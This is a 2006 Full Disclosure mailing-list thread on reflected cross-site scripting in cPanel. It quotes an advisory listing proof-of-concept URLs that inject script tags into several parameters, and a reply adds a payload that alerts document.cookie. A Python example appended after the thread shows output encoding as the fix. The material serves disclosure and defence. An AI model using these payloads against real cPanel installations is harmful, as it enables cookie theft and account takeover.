Full Disclosure mailing list archives
Re: cPanel Multiple Cross Site Scripting Vulnerability
From: Sumit Siddharth <sumit.siddharth () gmail com>
Date: Wed, 8 Feb 2006 11:15:56 +0530
One more to ur list:

http://localhost:2095/dowebmailforward.cgi?fwd=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E&action=Add+Forwarder

Sumit

On 2/4/06, Hamish Stanaway <koremeltdown () hotmail com> wrote:
Hi there,

Thank you for finding this vulnerability in widely used software. I was wondering if you had a solution or a workaround to this issue?

Kindest of regards,
Hamish Stanaway, CEO
Absolute Web Hosting / -= KoRe WoRkS =- Internet Security
Auckland, New Zealand
http://www.webhosting.net.nz
http://www.buywebhosting.co.nz
http://www.koreworks.com

From: simo () morx org
To: bugtraq () securityfocus com
Subject: cPanel Multiple Cross Site Scripting Vulnerability
Date: Fri, 3 Feb 2006 04:31:49 -0000 (GMT)
Title: cPanel Multiple Cross Site Scripting
Author: Simo Ben youssef aka _6mO_HaCk <simo_at_morx_org>
Discovered: 22 January 2005
Published: 02 February 2006
MorX Security Research Team
http://www.morx.org
Service: Web Hosting Manager
Vendor: cPanel
Vulnerability: Cross Site Scripting / Cookie-Theft / Relogin attacks
Severity: Medium/High

Details:
cPanel (control panel) is a graphical web-based management tool, designed to make administration of web sites as easy as possible. cPanel handles all aspects of website administration in an easy-to-use interface. The software, which is proprietary, runs on a number of popular RPM-based Linux distributions, such as SuSE, Fedora, Mandriva, CentOS, Red Hat Enterprise Linux, and cAos, as well as FreeBSD. cPanel is commonly accessed on ports 2082 and 2083 (for an SSL version). Authentication is either via HTTP or web page login.

cPanel is prone to cross-site scripting attacks. This problem is due to a failure in the application to properly sanitize user-supplied input.

Impact:
An attacker can exploit the vulnerable scripts to have arbitrary script code executed in the browser of an authenticated cPanel user in the context of the website hosting the vulnerable cPanel version, resulting in the theft of cookie-based authentication, giving the attacker full access to the victim's cPanel account, as well as other types of attacks.
Affected scripts with proof of concept exploit:

http://www.vulnerable-site.com:2082/frontend/xcontroller/editquota.html?email=<script>alert('vul')</script>&domain=
http://www.vulnerable-site.com:2082/frontend/xcontroller/dodelpop.html?email=<script>alert('vul')</script>&domain=xxx
http://www.vulnerable-site.com:2082/frontend/xcontroller/diskusage.html?showtree=0"><script>alert('vul')</script>
http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006&domain=xxx&target="><script>alert('vul')</script>
http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006&domain=xxx"><script>alert('vul')</script>&target=xxx
http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006"><script>alert('vul')</script>&domain=xxx&target=xxx
http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan"><script>alert('vul')</script>&year=2006&domain=xxx&target=xxx

Disclaimer: this entire document is for educational, testing and demonstration purposes only. Modification, use and/or publishing of this information is entirely at your OWN risk. The information provided in this advisory is to be used/tested on your OWN machine/account. I cannot be held responsible for any of the above.
--
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
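The advisory's parameters (`email`, `showtree`, `mon`, `domain`, `target`) are reflected into the page without output encoding, which is what lets the `<script>` and `">` payloads above become live markup. As an added example (not cPanel's code and not part of this thread), the following Python models such a handler with the vulnerable pattern beside the hardened one, using the advisory's own proof-of-concept parameter values; the host `www.vulnerable-site.com` and the page markup are constructed for the demonstration.

```python
# Added example (not cPanel's code): models a page that reflects the query
# parameters named in the advisory (editquota.html's `email`, diskusage.html's
# `showtree`) into HTML, first raw, as the advisory describes, and then with
# contextual output encoding, which is the fix for this class of bug.
import html
from urllib.parse import parse_qs, urlsplit

# Constructed from the advisory's proof-of-concept URLs (hypothetical host).
EDITQUOTA_URL = ("http://www.vulnerable-site.com:2082/frontend/xcontroller/"
                 "editquota.html?email=<script>alert('vul')</script>&domain=")
DISKUSAGE_URL = ("http://www.vulnerable-site.com:2082/frontend/xcontroller/"
                 "diskusage.html?showtree=0\"><script>alert('vul')</script>")


def query_params(url):
    """Return the query string as a dict, keeping empty values like `domain=`."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {k: v[0] for k, v in qs.items()}


def render_unsafe(email, showtree):
    """Vulnerable pattern: parameters pasted straight into HTML text and into a
    double-quoted attribute, so `<script>` and `">` are interpreted as markup."""
    return (f"<p>Quota for {email}</p>"
            f'<input name="showtree" value="{showtree}">')


def render_safe(email, showtree):
    """Hardened pattern: html.escape(quote=True) turns < > & " ' into entities,
    so neither value can leave its text node or its attribute."""
    return (f"<p>Quota for {html.escape(email, quote=True)}</p>"
            f'<input name="showtree" value="{html.escape(showtree, quote=True)}">')


def has_live_script(markup):
    """Demonstration check only: does a real <script> tag survive in the output?"""
    return "<script" in markup.lower()


if __name__ == "__main__":
    email = query_params(EDITQUOTA_URL)["email"]
    showtree = query_params(DISKUSAGE_URL)["showtree"]
    print("unsafe:", render_unsafe(email, showtree))
    print("safe:  ", render_safe(email, showtree))
```

The same encoding applies to every reflected parameter in the list above; an HttpOnly flag on the session cookie additionally limits the cookie-theft impact the advisory describes, but does not remove the XSS itself.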
Current thread:
- Re: cPanel Multiple Cross Site Scripting Vulnerability Sumit Siddharth (Feb 07)